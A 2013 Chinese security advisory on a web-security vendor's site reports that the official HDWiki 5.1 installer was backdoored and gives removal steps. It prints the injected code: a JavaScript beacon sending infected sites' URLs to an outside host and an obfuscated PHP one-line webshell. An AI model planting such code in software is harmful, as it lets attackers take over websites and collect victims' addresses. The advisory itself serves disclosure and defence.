热门搜索词

热门文章

  • 功能 | 平台登录安全策略升级及二次认证...

    为了进一步提升平台账号的安全性,防止因数据泄露导致的配置篡改等风险,我们近期对平台的登录安全策略进行了全面的加固与升级。此次升级的核心在于引入了二次认证机制,该机制能够在账号触发异常登录行为时,要求用户再次进行身份验证,从而有效增强账号的保护力度。

  • [公告]11月6日关于报表及日志服务维护...

    接运营商通知,北京时间 2024-11-06 00:00~06:00 将对报表及日志服务所在机房进行割接维护。在此期间,可能会导致报表查询/下载及日志下载不可用。若您有相关操作需求,请避开此时段进行。

  • [公告]11月2日知道创宇云防御平台升级...

    知道创宇云防御平台将于北京时间 2024-11-02 01:00 至 2024-11-02 03:00 进行升级维护。升级时间预计两小时,在此期间,知道创宇云防御平台将暂停访问,若您有需要通过云防御平台进行操作的需求,请避开此时间段,提前或在升级完成后进行处理。

关注知道创宇云防御

获取最新安全动态

预警:HDWiki官方下载包被植入后门

来源:知道创宇云防御 2013.09.20

9月20日消息,今日安全联盟站长平台(zhanzhang.anquan.org)接到漏洞修复专家反馈信息称HDWiki百科建站系统“HDWiki5.1 正式版”(包括UTF8和GBK版本)下载安装包文件里被植入恶意网站木马(后门)文件。安全联盟研究人员立即确认并分析了该“木马后门”,初步推断官方网站被黑客入侵后,在最新HDwiki的下载安装包里植入了恶意网站木马文件,当站长用户下载安装后,会把该网站木马文件直接带入到站长的网站上,然后黑客可通过该该网站木马完全控制站长用户的网站系统,使网站沦为“肉鸡”。目前安全联盟站长平台已积极联系HDwiki官方,并发布紧急预警,目前请站长朋友们暂停下载安装HDWiki百科建站系统,对近期下载安装过HDwiki的朋友,百度加速乐(jiasule.baidu.com)联合安全联盟站长平台提供独家解决方案。

后门文件分析
经过我们分析,在HDWiki安装文件包里的文件做了如下修改:
一、在文件/hdwiki/install/install.php里 83-84行加入了如下代码:

if(!window.x){
    (function(){(new Image()).src='http://kaiyuan.hudong.com/count2/install.php?location='+escape((function(){try{return document.location.href}catch(e){return ''}})());})();

二、增加一个php文件,也就是我们的木马文件,位置在/hdwiki/js/jqeditor/skins/bg/index.php 代码如下:

<?php
/*
[UCenter] (C)2001-2009 Comsenz Inc.
This is NOT a freeware, use is subject to license terms

$Id: client.php 913 2009-01-12 03:48:34Z zhaoxiongfei $
*/
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[马赛克]);
?>
代码经过了编码加密,我们解密后确认该代码就是一个恶意的网站木马文件(编码加密过的“一句话木马”)。

那么第一个文件里插入的js代码应该是为了收集“中招”了的网站地址,值得注意的是攻击者直接使用了官方的网站地址来收集这些信息。同时我们也注意到这个手法和以前的后门事件是非常相似的。

历史上的“HDwiki后门事件”

就在今年5月7日,HDwiki官方安装下载文件包里曾经也被植入了恶意的网站木马后门。
详细见:http://bbs.jiasule.com/thread-3342-1-1.html

解决方案

查看您的网站是否存在文件 /hdwiki/js/jqeditor/skins/bg/index.php 如果存在直接删除。另外我们也更新了“HDWiki后面检测程序”(http://www.scanv.com/tools/ ),输入网址即可自动诊断。

售前支持

400-161-0866